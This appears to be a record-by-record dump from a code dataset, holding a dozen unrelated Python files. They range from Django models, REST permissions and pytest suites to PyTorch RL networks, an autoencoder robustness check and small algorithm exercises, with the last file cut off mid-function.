            p = Person.get(id=1)
            self.assertEqual(p.name, None)

    @raises_exception(DatabaseContainsIncorrectEmptyValue,
                      'Database contains NULL for required attribute Person.name')
    @db_session
    def test_2b(self):
        # NULL with warnings-as-errors must raise.
        with warnings.catch_warnings():
            warnings.simplefilter('error', DatabaseContainsIncorrectEmptyValue)
            db.insert('Person', id=1, name=None, tel='111')
            p = Person.get(id=1)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
5,673 | 2bccfba2448059a41185b117b224813e344b50f8 | from simple_avk.AVK import SimpleAVK
from simple_avk.exceptions import MethodError, LongpollError
|
5,674 | 4549f26cf8051535f9d3486d111fc7afe7514dea | from rest_framework import permissions
class AdminUrlUserPermission(permissions.BasePermission):
    """Grant access only to authenticated admins or superusers."""

    def has_permission(self, request, view):
        user = request.user
        if not user.is_authenticated:
            return False
        return user.role == 'admin' or user.is_superuser

    def has_object_permission(self, request, view, obj):
        user = request.user
        return user.role == 'admin' or user.is_superuser
class ReadOnly(permissions.BasePermission):
    """Permit only safe (read-only) HTTP methods."""

    def has_permission(self, request, view):
        method = request.method
        return method in permissions.SAFE_METHODS
class AuthorModeratorAdminOrReadOnly(permissions.BasePermission):
    """Allow reads to anyone; writes to the author, moderators or admins."""

    def has_permission(self, request, view):
        """Safe methods are open; everything else requires authentication."""
        is_safe = request.method in permissions.SAFE_METHODS
        is_auth = request.user.is_authenticated
        return is_safe or is_auth

    def has_object_permission(self, request, view, obj):
        """Object writes require authorship or a privileged role.

        Bug fix: the privileged flag previously defaulted to ``None``, so
        this method could return ``None`` instead of ``False``; it now
        always returns a real boolean.
        """
        is_safe = request.method in permissions.SAFE_METHODS
        is_author = obj.author == request.user
        is_privileged = False
        if request.user.is_authenticated:
            is_privileged = request.user.role in ('moderator', 'admin')
        return is_author or is_safe or is_privileged
|
5,675 | 7537deb4560e880365b23a99584d0b1f8fa3daf4 | from click.testing import CliRunner
from apitest.actions.cli import cli
def test_sendto_cli_runs_ok():
    """The 'sendto' subcommand should exit with status 0."""
    runner = CliRunner()
    outcome = runner.invoke(cli, ["sendto"])
    assert outcome.exit_code == 0
|
5,676 | 9101fc5b8ba04a1b72e0c79d5bf3e4118e1bad75 | #! /usr/bin/python
import math
import sys
import os
import subprocess
#PTYPES = [ "eth_ip_udp_head_t", "ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
#PTYPES = [ "eth_ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
PTYPE = "volatile eth_ip_udp_head_t"
#PTYPE = "volatile eth6464_64ip64_64udp_head_t"
def log_out(out):
    """Print *out* with its final character (a trailing newline) stripped."""
    trimmed = out[:-1]
    print(trimmed)
def run_proc(p, wait):
    """Run shell command *p*, logging its stderr then its stdout.

    When *wait* is False the command executes in a forked child process:
    the parent returns immediately, and the child exits via sys.exit(0)
    after logging the command's output.
    """
    if not wait:
        pid = os.fork()
        if pid != 0:
            # Parent: do not wait for the forked child.
            return
    proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    proc.wait()
    log_out("STDERR -- %s\n" % p)
    for line in proc.stderr:
        log_out(line)
    log_out("STDOUT -- %s\n" % p)
    for line in proc.stdout:
        log_out(line)
    if not wait:
        # Child process terminates here after logging.
        sys.exit(0)
# Build plot arguments: one "<stats-file> <size-label>" pair per packet
# count, on a roughly logarithmic grid from 1 to 5M packets.
# NOTE: this is Python 2 code (bare `print` statements, list-returning range).
args = []
for i in [1,10] + \
    range(100,1000,200) + \
    range(1000,10 *1000, 1000) + \
    range(10 * 1000,100 * 1000, 20 * 1000) + \
    range(100 * 1000, 1000 * 1000, 200 * 1000) + \
    range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000):
    packet_count = i
    outdir = "experiments/baseline"
    test_id = "%010i" % (packet_count)
    # 2048 bytes per packet, reported in MB.
    args.append( "%s/%s.stats %4.2fMB" % (outdir, test_id, i * 2048 / 1024.0 / 1024.0))
# Generate the four plots; RD/APRD run in forked children (wait=False)
# while WR/APWR run synchronously, pairing the work two at a time.
cmd = "./plot_fast_net.py RD %s baseline-rd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py WR %s baseline-wr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
cmd = "./plot_fast_net.py APRD %s baseline-aprd.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,False)
cmd = "./plot_fast_net.py APWR %s baseline-apwr.pdf" % (" ".join(args) )
print cmd
run_proc(cmd,True)
|
5,677 | 6f6d3fbb9a6a118e0f4026a7f9054b90b8cf2fca | # from dataclasses import InitVar, dataclass
# standard library imports
from math import floor
# third-party imports
import gym
import torch
from torch.nn import Conv2d, Linear, MaxPool2d, Module, ModuleList, ReLU, Sequential
from torch.nn import functional as F
# local imports
from tmrl.nn import TanhNormalLayer
from tmrl.sac_models import ActorModule, MlpActionValue, SacLinear, prod
import logging
# === Trackmania =======================================================================================================
def num_flat_features(x):
    """Number of elements per sample in *x*, ignoring the batch dimension."""
    count = 1
    for dim in x.size()[1:]:
        count *= dim
    return count
def conv2d_out_dims(conv_layer, h_in, w_in):
    """Output (height, width) of *conv_layer* applied to an h_in x w_in input.

    Implements the standard Conv2d output-size formula per spatial axis,
    reading padding/dilation/kernel/stride from the layer itself.
    """
    def _axis(size, axis):
        pad = conv_layer.padding[axis]
        dil = conv_layer.dilation[axis]
        kernel = conv_layer.kernel_size[axis]
        stride = conv_layer.stride[axis]
        return floor((size + 2 * pad - dil * (kernel - 1) - 1) / stride + 1)

    return _axis(h_in, 0), _axis(w_in, 1)
class Net(Module):
    """Small CNN: three conv + 4x4 max-pool stages, then one linear layer.

    NOTE(review): self.conv4 is defined but never used in forward() --
    confirm whether it is dead code or a missing fourth stage.
    """
    def __init__(self):
        super(Net, self).__init__()
        self.conv1 = Conv2d(3, 8, (8, 8))
        self.conv2 = Conv2d(8, 16, (4, 4))
        self.conv3 = Conv2d(16, 32, (3, 3))
        self.conv4 = Conv2d(32, 64, (3, 3))  # unused in forward() (see class note)
        # 672 in-features: assumed to equal the flattened conv3 output for
        # the expected input size -- TODO confirm against caller.
        self.fc1 = Linear(672, 253)

    def forward(self, x):
        # Each stage: conv -> ReLU -> 4x4 max pool.
        x = F.max_pool2d(F.relu(self.conv1(x)), (4, 4))
        x = F.max_pool2d(F.relu(self.conv2(x)), (4, 4))
        x = F.max_pool2d(F.relu(self.conv3(x)), (4, 4))
        x = x.view(-1, num_flat_features(x))  # flatten all but the batch dim
        x = F.relu(self.fc1(x))
        return x
class DeepmindCNN(Module):
    """Three-conv feature extractor; output is flattened per sample.

    Spatial output dims are tracked at construction via conv2d_out_dims so
    `flat_features` is known before the first forward pass.
    (Name suggests the DQN architecture -- kernel/stride values match, but
    that provenance is not verifiable from this file.)
    """
    def __init__(self, h_in, w_in, channels_in):
        super(DeepmindCNN, self).__init__()
        self.h_out, self.w_out = h_in, w_in
        self.conv1 = Conv2d(in_channels=channels_in, out_channels=32, kernel_size=(8, 8), stride=4, padding=0, dilation=1, bias=True, padding_mode='zeros')
        self.h_out, self.w_out = conv2d_out_dims(self.conv1, self.h_out, self.w_out)
        self.conv2 = Conv2d(in_channels=32, out_channels=64, kernel_size=(4, 4), stride=2, padding=0, dilation=1, bias=True, padding_mode='zeros')
        self.h_out, self.w_out = conv2d_out_dims(self.conv2, self.h_out, self.w_out)
        self.conv3 = Conv2d(in_channels=64, out_channels=64, kernel_size=(3, 3), stride=1, padding=0, dilation=1, bias=True, padding_mode='zeros')
        self.h_out, self.w_out = conv2d_out_dims(self.conv3, self.h_out, self.w_out)
        self.out_channels = self.conv3.out_channels
        # Flattened feature count per sample after conv3.
        self.flat_features = self.out_channels * self.h_out * self.w_out
        logging.debug(f" h_in:{h_in}, w_in:{w_in}, h_out:{self.h_out}, w_out:{self.w_out}, flat_features:{self.flat_features}")

    def forward(self, x):
        logging.debug(f" forward, shape x :{x.shape}")
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        x = F.relu(self.conv3(x))
        # Sanity-check the precomputed size against the actual tensor.
        flat_features = num_flat_features(x)
        assert flat_features == self.flat_features, f"x.shape:{x.shape}, flat_features:{flat_features}, self.out_channels:{self.out_channels}, self.h_out:{self.h_out}, self.w_out:{self.w_out}"
        x = x.view(-1, flat_features)
        return x
class BigCNN(Module):
    """Four-conv feature extractor (stride-2 throughout); output flattened.

    Like DeepmindCNN, the spatial output dims and flat feature count are
    precomputed at construction via conv2d_out_dims.
    """
    def __init__(self, h_in, w_in, channels_in):
        super(BigCNN, self).__init__()
        self.h_out, self.w_out = h_in, w_in
        self.conv1 = Conv2d(channels_in, 64, 8, stride=2)
        self.h_out, self.w_out = conv2d_out_dims(self.conv1, self.h_out, self.w_out)
        self.conv2 = Conv2d(64, 64, 4, stride=2)
        self.h_out, self.w_out = conv2d_out_dims(self.conv2, self.h_out, self.w_out)
        self.conv3 = Conv2d(64, 128, 4, stride=2)
        self.h_out, self.w_out = conv2d_out_dims(self.conv3, self.h_out, self.w_out)
        self.conv4 = Conv2d(128, 128, 4, stride=2)
        self.h_out, self.w_out = conv2d_out_dims(self.conv4, self.h_out, self.w_out)
        self.out_channels = self.conv4.out_channels
        # Flattened feature count per sample after conv4.
        self.flat_features = self.out_channels * self.h_out * self.w_out
        logging.debug(f" h_in:{h_in}, w_in:{w_in}, h_out:{self.h_out}, w_out:{self.w_out}, flat_features:{self.flat_features}")

    def forward(self, x):  # TODO: Simon uses leaky relu instead of relu, see what works best
        # logging.debug(f" forward, shape x :{x.shape}")
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        x = F.relu(self.conv3(x))
        x = F.relu(self.conv4(x))
        # Sanity-check the precomputed size against the actual tensor.
        flat_features = num_flat_features(x)
        assert flat_features == self.flat_features, f"x.shape:{x.shape}, flat_features:{flat_features}, self.out_channels:{self.out_channels}, self.h_out:{self.h_out}, self.w_out:{self.w_out}"
        x = x.view(-1, flat_features)
        return x
class TM20CNNModule(Module):
    """Trunk shared by the TM20 policy and Q networks.

    Encodes 4 stacked images with BigCNN, concatenates velocity / gear /
    rpm (plus the action buffer, and the action itself for Q networks),
    and maps the result through one linear layer to 512 features.
    """
    def __init__(self, observation_space, action_space, is_q_network, act_buf_len=0):
        super().__init__()
        assert isinstance(observation_space, gym.spaces.Tuple)
        # Observation layout assumed: (vel, gear, rpm, images, *action_buffer)
        # -- inferred from the indexing below; confirm against the env.
        self.img_dims = observation_space[3].shape
        self.vel_dim = observation_space[0].shape[0]
        self.gear_dim = observation_space[1].shape[0]
        self.rpm_dim = observation_space[2].shape[0]
        self.is_q_network = is_q_network
        self.act_buf_len = act_buf_len
        self.act_dim = action_space.shape[0]
        logging.debug(f" self.img_dims: {self.img_dims}")
        h_in = self.img_dims[2]
        w_in = self.img_dims[3]
        channels_in = self.img_dims[0] * self.img_dims[1]  # successive images as channels
        self.cnn = BigCNN(h_in=h_in, w_in=w_in, channels_in=channels_in)
        # Fully-connected input: CNN features + telemetry (+ actions).
        dim_fc1_in = self.cnn.flat_features + self.vel_dim + self.gear_dim + self.rpm_dim
        if self.is_q_network:
            dim_fc1_in += self.act_dim
        if self.act_buf_len:
            dim_fc1_in += self.act_dim * self.act_buf_len
        self.fc1 = Linear(dim_fc1_in, 512)

    def forward(self, x):
        vel = x[0].float()
        gear = x[1].float()
        rpm = x[2].float()
        ims = x[3].float()
        im1 = ims[:, 0]
        im2 = ims[:, 1]
        im3 = ims[:, 2]
        im4 = ims[:, 3]
        if self.act_buf_len:
            all_acts = torch.cat((x[4:]), dim=1).float()  # if q network, the last action will be act
        else:
            # Operating without an action buffer is not supported.
            raise NotImplementedError
        cat_im = torch.cat((im1, im2, im3, im4), dim=1)  # cat on channel dimension
        h = self.cnn(cat_im)
        h = torch.cat((h, vel, gear, rpm, all_acts), dim=1)
        h = self.fc1(h)  # No ReLU here because this is done in the Sequential
        return h
class TMActionValue(Sequential):
    """Q-network head: TM20CNNModule trunk followed by an MLP with 2 outputs.

    The two outputs are separate reward components (see the comment on the
    final Linear layer).
    """

    def __init__(self, observation_space, action_space, act_buf_len=0):
        super().__init__(
            TM20CNNModule(observation_space, action_space, is_q_network=True, act_buf_len=act_buf_len),
            ReLU(),
            Linear(512, 256),
            ReLU(),
            Linear(256, 2)  # we separate reward components
        )

    # noinspection PyMethodOverriding
    def forward(self, obs, action):
        """Append the action to the observation tuple and run the Sequential."""
        x = (*obs, action)
        res = super().forward(x)
        # logging.debug(f" av res:{res}")
        return res
class TMPolicy(Sequential):
    """Policy head: TM20CNNModule trunk -> ReLU -> Linear -> ReLU -> TanhNormalLayer."""

    def __init__(self, observation_space, action_space, act_buf_len=0):
        super().__init__(
            TM20CNNModule(observation_space, action_space, is_q_network=False, act_buf_len=act_buf_len),
            ReLU(),
            Linear(512, 256),
            ReLU(),
            TanhNormalLayer(256, action_space.shape[0]),
        )

    # noinspection PyMethodOverriding
    def forward(self, obs):
        """Feed the raw observation tuple straight through the Sequential."""
        # res = super().forward(torch.cat(obs, 1))
        return super().forward(obs)
class Tm_hybrid_1(ActorModule):
    """Actor-critic module: one TMPolicy actor plus ``num_critics`` TMActionValue critics."""

    def __init__(self, observation_space, action_space, hidden_units: int = 512, num_critics: int = 2, act_buf_len=0):
        super().__init__()
        assert isinstance(observation_space, gym.spaces.Tuple), f"{observation_space} is not a spaces.Tuple"
        self.critics = ModuleList(TMActionValue(observation_space, action_space, act_buf_len=act_buf_len) for _ in range(num_critics))
        self.actor = TMPolicy(observation_space, action_space, act_buf_len=act_buf_len)
        # Handles to each critic's final Linear layer, kept for external
        # access; the exact purpose is not visible from this file.
        self.critic_output_layers = [c[-1] for c in self.critics]
|
class tenDParameters:
    """Container for a 10-parameter kinematic observation.

    Names suggest galactic coordinates: latitude ``b``, distance modulus
    ``DM``, proper motions ``pm_l``/``pm_b``, radial velocity ``vrad``,
    the corresponding uncertainties ``sb``/``spml``/``spmb``/``sdm``, and a
    value ``vc`` — confirm the exact semantics against the caller.
    """

    def __init__(self,
                 b: float,
                 DM: float,
                 pm_l: float,
                 pm_b: float,
                 vrad: float,
                 sb: float,
                 spml: float,
                 spmb: float,
                 sdm: float,
                 vc: float):
        self.b = b
        self.DM = DM
        # this is actually pm_l * cos b, apparently
        self.pm_l = pm_l
        self.pm_b = pm_b
        self.vrad = vrad
        self.sb = sb
        self.spml = spml
        self.spmb = spmb
        self.sdm = sdm
        self.vc = vc
5,679 | c36adc3cf5de2f0ae3ee9b9823304df393ebce63 | """
code: pmap_io_test.py
"""
import os
import time
import tables as tb
import numpy as np
from pytest import mark
from .. core.system_of_units_c import units
from .. database import load_db
from .. sierpe import blr
from . import tbl_functions as tbl
from . import peak_functions as pf
from . import peak_functions_c as cpf
from . params import S12Params as S12P
from . params import ThresholdParams
from . params import PMaps
from . pmap_io import pmap_writer
from . pmap_io import S12
from . pmap_io import S2Si
from . pmaps_functions import read_pmaps
from . pmaps_functions import read_run_and_event_from_pmaps_file
from . pmaps_functions_c import df_to_pmaps_dict
from . pmaps_functions_c import df_to_s2si_dict
@mark.parametrize('filename, with_',
                  (('test_pmaps_auto.h5', True),
                   ('test_pmaps_manu.h5', False)))
def test_pmap_writer(config_tmpdir, filename, with_,
                     s12_dataframe_converted,
                     s2si_dataframe_converted):
    """Round-trip test for pmap_writer.

    Writes pmaps to HDF5 (once via context manager, once with a manual
    close, selected by ``with_``), reads them back, and checks that S12s,
    S2Sis, event numbers and run numbers survive unchanged.
    """
    PMP_file_name = os.path.join(str(config_tmpdir), filename)
    # Get test data
    s12, a = s12_dataframe_converted
    s2si, b = s2si_dataframe_converted
    P = PMaps(s12, s12, s2si)  # TODO Remove duplication of s12
    event_numbers = sorted(set(s12).union(set(s2si)))
    # Fake nanosecond timestamps built from the sub-second wall-clock part.
    timestamps = {e: int(time.time() % 1 * 10 ** 9) for e in event_numbers}
    run_number = 632
    # The actual pmap writing: the component whose functionality is
    # being tested here.
    # Two different ways of using pmap_writer (both tested by
    # different parametrizations of this test)
    if with_:  # Close implicitly with context manager
        with pmap_writer(PMP_file_name) as write:
            for e in event_numbers:
                timestamp = timestamps[e]
                s1 = S12(P.S1.get(e, {}))
                s2 = S12(P.S2.get(e, {}))
                # NOTE(review): this rebinds the local "s2si" (fixture data)
                # to an S2Si instance; harmless here, but confusing.
                s2si = S2Si(P.S2Si.get(e, {}))
                write(run_number, e, timestamp, s1, s2, s2si)
    else:  # Close manually
        write = pmap_writer(PMP_file_name)
        for e in event_numbers:
            timestamp = timestamps[e]
            s1 = S12(P.S1.get(e, {}))
            s2 = S12(P.S2.get(e, {}))
            s2si = S2Si(P.S2Si.get(e, {}))
            write(run_number, e, timestamp, s1, s2, s2si)
        write.close()
    # Read back the data we have just written
    s1df, s2df, s2sidf = read_pmaps(PMP_file_name)
    rundf, evtdf = read_run_and_event_from_pmaps_file(PMP_file_name)
    # Convert them into our transient format
    S1D = df_to_pmaps_dict(s1df)
    S2D = df_to_pmaps_dict(s2df)
    S2SiD = df_to_s2si_dict(s2sidf)
    ######################################################################
    # Compare original data to those read back
    # The S12s
    # NOTE(review): the loop names are swapped — "original_S" iterates the
    # data read back from disk while "recovered_S" is the in-memory
    # original. The comparison itself is still valid.
    for original_S, recovered_S in zip((S1D, S2D),
                                       (P.S1, P.S2)):
        for event_no, event in recovered_S.items():
            for peak_no, recovered_peak in event.items():
                original_peak = original_S[event_no][peak_no]
                np.testing.assert_allclose(recovered_peak.t, original_peak.t)
                np.testing.assert_allclose(recovered_peak.E, original_peak.E)
    # The S2Sis
    for event_no, event in S2SiD.items():
        for peak_no, peak in event.items():
            for sipm_id, recovered_Es in peak.items():
                original_Es = P.S2Si[event_no][peak_no][sipm_id]
                np.testing.assert_allclose(recovered_Es, original_Es)
    # Event numbers
    np.testing.assert_equal(evtdf.evt_number.values,
                            np.array(event_numbers, dtype=np.int32))
    # Run numbers
    np.testing.assert_equal(rundf.run_number.values,
                            np.full(len(event_numbers), run_number, dtype=np.int32))
@mark.slow
def test_pmap_electrons_40keV(config_tmpdir):
    """End-to-end check: build pmaps from a 40 keV electron RWF file, write
    them with pmap_writer, read them back and compare peak-by-peak."""
    # NB: avoid taking defaults for PATH_IN and PATH_OUT
    # since they are in general test-specific
    # NB: avoid taking defaults for run number (test-specific)
    RWF_file_name = os.path.join(os.environ['ICDIR'],
                                 'database/test_data/',
                                 'electrons_40keV_z250_RWF.h5')
    PMAP_file_name = os.path.join(str(config_tmpdir),
                                  'electrons_40keV_z250_PMP.h5')
    # Search windows / thresholds for S1 and S2 peak finding.
    s1_params = S12P(tmin=90*units.mus,
                     tmax=110*units.mus,
                     lmin=4,
                     lmax=20,
                     stride=4,
                     rebin=False)
    s2_params = S12P(tmin=110*units.mus,
                     tmax=1190*units.mus,
                     lmin=80,
                     lmax=200000,
                     stride=40,
                     rebin=True)
    thr = ThresholdParams(thr_s1=0.2*units.pes,
                          thr_s2=1*units.pes,
                          thr_MAU=3*units.adc,
                          thr_sipm=5*units.pes,
                          thr_SIPM=20*units.pes)
    run_number = 0
    with tb.open_file(RWF_file_name, 'r') as h5rwf:
        with pmap_writer(PMAP_file_name) as write:
            # waveforms
            pmtrwf, pmtblr, sipmrwf = tbl.get_vectors(h5rwf)
            # data base
            DataPMT = load_db.DataPMT(run_number)
            pmt_active = np.nonzero(DataPMT.Active.values)[0].tolist()
            adc_to_pes = abs(DataPMT.adc_to_pes.values)
            coeff_c = abs(DataPMT.coeff_c.values)
            coeff_blr = abs(DataPMT.coeff_blr.values)
            DataSiPM = load_db.DataSiPM()
            adc_to_pes_sipm = DataSiPM.adc_to_pes.values
            # number of events
            NEVT = pmtrwf.shape[0]
            # number of events for test (at most NEVT)
            NTEST = 2
            # loop
            XS1L = []
            XS2L = []
            XS2SiL = []
            for event in range(NTEST):
                # deconv
                CWF = blr.deconv_pmt(pmtrwf[event], coeff_c, coeff_blr, pmt_active)
                # calibrated sum
                csum, csum_mau = cpf.calibrated_pmt_sum(CWF,
                                                        adc_to_pes,
                                                        pmt_active = pmt_active,
                                                        n_MAU=100,
                                                        thr_MAU=thr.thr_MAU)
                # zs sum
                s2_ene, s2_indx = cpf.wfzs(csum, threshold=thr.thr_s2)
                # NOTE(review): s2_t and s1_t are computed but never used.
                s2_t = cpf.time_from_index(s2_indx)
                s1_ene, s1_indx = cpf.wfzs(csum_mau, threshold=thr.thr_s1)
                s1_t = cpf.time_from_index(s1_indx)
                # S1 and S2
                s1 = cpf.find_S12(s1_ene, s1_indx, **s1_params._asdict())
                s2 = cpf.find_S12(s2_ene, s2_indx, **s2_params._asdict())
                # S2Si
                sipm = cpf.signal_sipm(sipmrwf[event],
                                       adc_to_pes_sipm,
                                       thr=thr.thr_sipm,
                                       n_MAU=100)
                SIPM = cpf.select_sipm(sipm)
                s2si = pf.sipm_s2_dict(SIPM, s2, thr=thr.thr_SIPM)
                # tests:
                # energy vector and time vector equal in S1 and s2
                assert len(s1[0][0]) == len(s1[0][1])
                assert len(s2[0][0]) == len(s2[0][1])
                if s2 and s2si:
                    for nsipm in s2si[0]:
                        assert len(s2si[0][nsipm]) == len(s2[0][0])
                # make S1, S2 and S2Si objects (from dicts)
                S1 = S12(s1)
                S2 = S12(s2)
                Si = S2Si(s2si)
                # store in lists for further testing
                XS1L.append(s1)
                XS2L.append(s2)
                XS2SiL.append(s2si)
                # produce a fake timestamp (in real like comes from data)
                timestamp = int(time.time())
                # write to file
                write(run_number, event, timestamp, S1, S2, Si)
    # Read back
    s1df, s2df, s2sidf = read_pmaps(PMAP_file_name)
    rundf, evtdf = read_run_and_event_from_pmaps_file(PMAP_file_name)
    # get the dicts
    S1L = df_to_pmaps_dict(s1df)
    S2L = df_to_pmaps_dict(s2df)
    S2SiL = df_to_s2si_dict(s2sidf)
    # test: compare the in-memory peaks with what was read back from disk
    for event in range(len(XS1L)):
        s1 = XS1L[event]
        if s1:  # dictionary not empty
            s1p = S1L[event]
            for peak_number in s1p:
                np.testing.assert_allclose(s1p[peak_number].t,
                                           s1[peak_number][0])
                np.testing.assert_allclose(s1p[peak_number].E,
                                           s1[peak_number][1])
        s2 = XS2L[event]
        if s2:
            s2p = S2L[event]
            for peak_number in s2p:
                np.testing.assert_allclose(s2p[peak_number].t,
                                           s2[peak_number][0])
                np.testing.assert_allclose(s2p[peak_number].E,
                                           s2[peak_number][1])
        s2si = XS2SiL[event]
        if s2si:
            sip = S2SiL[event]
            for peak_number in sip:
                sipm = sip[peak_number]
                sipm2 = s2si[peak_number]
                for nsipm in sipm:
                    np.testing.assert_allclose(sipm[nsipm], sipm2[nsipm])
|
5,680 | d123083358a4fd69f6f8de27fa177afac3bf80ce | from functools import update_wrapper
from django.db import models
# Create your models here.
class Product(models.Model):
    """A catalogue item offered in the shop."""
    # NOTE(review): models.AutoField is assigned as a CLASS, not an instance
    # (missing parentheses), so Django does not create this column and the
    # model falls back to the implicit auto "id" primary key. Instantiating
    # it (e.g. AutoField(primary_key=True)) would change the schema and the
    # primary-key name — confirm migrations/callers before fixing.
    product_id=models.AutoField
    product_name=models.CharField(max_length=50)
    category=models.CharField(max_length=50,default="")
    subcategory=models.CharField(max_length=50,default="")
    desc=models.CharField(max_length=300)
    price=models.IntegerField(default=0)
    pub_date=models.DateField()
    image=models.ImageField(upload_to='shop/images',default="")

    def __str__(self):
        # Admin/listing display name.
        return self.product_name
class Contact(models.Model):
    """Message submitted through the site's contact form."""

    msg_id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=50, default="")
    email = models.CharField(max_length=50, default="")
    desc = models.CharField(max_length=1000, default="")
    phone = models.CharField(max_length=50, default="")

    def __str__(self):
        """Show the sender's name in admin listings."""
        return self.name
class Order(models.Model):
    """A placed order; purchased items are stored as JSON in item_json."""

    order_id = models.AutoField(primary_key=True)
    item_json = models.CharField(max_length=10000, default="")
    name = models.CharField(max_length=100, default="")
    email = models.CharField(max_length=100, default="")
    address = models.CharField(max_length=100, default="")
    locality = models.CharField(max_length=50, default="")
    city = models.CharField(max_length=1000, default="")
    state = models.CharField(max_length=1000, default="")
    zip = models.CharField(max_length=1000, default="")
    phone = models.CharField(max_length=1000, default="")
class OrderUpdate(models.Model):
    """Status update attached to an order via its integer order_id."""

    update_id = models.AutoField(primary_key=True)
    order_id = models.IntegerField(default=0)
    update_desc = models.CharField(max_length=50000, default="")
    timestamp = models.DateField(auto_now_add=True)

    def __str__(self):
        """Short preview of the update text."""
        return self.update_desc[0:7] + "..."
|
5,681 | 44e1208a2165fe68f71d0aa49baa29b26c961e02 | import pandas as pd
import copy as cp
import numpy as np
from autoencoder import *
from encoding import smtEncoding
import matplotlib
import matplotlib.pyplot as plt
from data_generator import *
from marabou_encoding import marabouEncoding
def main():
    """Train an autoencoder on (generated) data and check adversarial robustness.

    Loads the sine-curve dataset, trains a small autoencoder, saves it, and
    then checks an adversarial-robustness property with both the SMT and
    the Marabou encodings.
    """
    # Change the architecture of the autoencoder according to requirement
    architecture = [10, 5, 10]
    print('----------Training autoencoder----------')
    aut = autoencoder(architecture=architecture)
    data = pd.read_csv('datasets/sine_curve.csv', header=None)
    aut.train(data, epochs=20, learning_rate=0.01)
    if not aut.saveflag:
        aut.saveAE()
        print("Saving the autoencoder after training")
    # plot_output([data, aut.predict(data)], ['Original', 'Reconstructed'])
    print("------Checking properties of autoencoders-------")
    # Parameters that can be modified
    boundingBox = 1  # Region around origin where the properties need to checked
    prop1 = ['adversarial-example', 0.1]
    prop2 = ['adversarial-robustness', [1] * 10, 0.1, 0.1]
    prop3 = ['fairness', 1, 0.1]
    enc = smtEncoding()
    counterExample = enc.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1)
    # For marabou
    mara = marabouEncoding()
    mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder="Demo-aut/autoencoder.onnx")
    # Fix: compare with None using "is", not "==" (PEP 8; "==" may be overridden).
    if counterExample is None:
        print("Autoencoder satisfies property is the given region")
    else:
        print("Autoencoder does not satisfy property in the given region for", counterExample)
main()
|
5,682 | 3ff3b8a1d8e74c09da9d6f39e4abf0963002a812 | #!/usr/bin/python
import sys
import cgi
import urllib2
# Resolve the final URL that the given URL redirects to (Python 2 / urllib2).
url = sys.argv[1]
try:
    response = urllib2.urlopen(url)
    redir = response.geturl()  # URL after any redirects were followed
except Exception:
    # Best-effort: report the traceback text instead of the URL on failure.
    import traceback
    redir = 'generic exception: ' + traceback.format_exc()
print redir
|
5,683 | 2044140fb2678f9507946007fdfb7edbaf11798e | from random import shuffle
"""all sorting algorithm implementation"""
class Sorts:
    """All sorting algorithm implementations."""

    def quick_sort(self, elements):
        """Return a new sorted list using randomized quicksort.

        Fixes over the previous version:
        * the input is copied before shuffling, so the caller's list is no
          longer mutated as a side effect;
        * the debug print of the pivot was removed (library code should not
          write to stdout).
        """
        if len(elements) < 2:
            return list(elements)
        items = list(elements)
        shuffle(items)  # randomize pivot choice to avoid worst-case inputs
        pivot = items[0]
        less = [i for i in items[1:] if i <= pivot]
        more = [i for i in items[1:] if i > pivot]
        return self.quick_sort(less) + [pivot] + self.quick_sort(more)
|
5,684 | 0c14a6fa8b25e1791a6eb9c71290db8bb316819a | # https://kyu9341.github.io/algorithm/2020/03/11/algorithm14226/
# https://developingbear.tistory.com/138
# https://devbelly.tistory.com/108
# 이모티콘 s개 생성
# 3가지 연산 이용
# bfs 이용 => visited를 이모티콘 방문 여부 2차원 배열 => 이모티콘의 수 와 클립보드에 저장된 이모티콘의 갯수를 이용
from collections import deque

# BOJ 14226 "Emoticon": reach s emoticons on screen in minimum time using
# three operations — copy-all to clipboard, paste clipboard, delete one.
# BFS over the state (emoticons on screen, emoticons on clipboard).
s = int(input())
q = deque()
# visited[number of emoticons on screen][number of emoticons on clipboard]
visited = [[False] * 1001 for _ in range(1001)]
visited[1][0] = True
# State tuple: (emoticons on screen, emoticons on clipboard, elapsed time)
q.append((1, 0, 0))
while q:
    e, clip, t = q.popleft()
    if e == s:
        print(t)
        exit(0)
    # Operation 1: copy everything on screen to the clipboard.
    if 0 < e < 1001:
        if visited[e][e] is False:
            visited[e][e] = True
            q.append((e, e, t + 1))
    # No "clip > 0" guard needed here: the paste is bounded by the visited
    # table and e > 0 was already required above.
    # Operation 2: paste the clipboard.
    if e + clip < 1001 and visited[e + clip][clip] is False:
        visited[e + clip][clip] = True
        q.append((e + clip, clip, t + 1))
    # Operation 3: delete one emoticon. Deliberately unguarded so deletion
    # is explored from every state, not only when e exceeds 1000.
    # NOTE(review): if e ever reaches 0, e - 1 == -1 indexes the LAST row of
    # visited (Python negative indexing) — presumably harmless within this
    # problem's bounds, but worth confirming.
    if visited[e - 1][clip] is False:
        visited[e - 1][clip] = True
        q.append((e - 1, clip, t + 1))
|
5,685 | 9594cda360847d2878aa2bd9c9c85fe50562b6ab | #!/usr/bin/python
import json, sys, getopt, re
# Usage: ./get_code.py -i <inputfile>
def main(argv):
    # Load an Elasticsearch-style JSON dump, extract the <script> block of
    # every gist, write each one to data/<author>_<gistid>.html, and collect
    # a simplified record per gist into nodes.json. (Python 2 code.)
    inputfile = argv[0]
    with open(inputfile) as json_data:
        d=json.load(json_data)
        json_data.close()  # NOTE(review): redundant inside a "with" block
    code_array = d["hits"]["hits"]
    output_json = []
    for element in code_array:
        gistid = element["_id"]
        e = element["_source"]
        # Drop non-ASCII characters before writing the HTML snapshot.
        code = e["code"].encode('ascii', 'ignore')
        author = e["userId"]
        code = get_js_only(code)
        if(code != None):
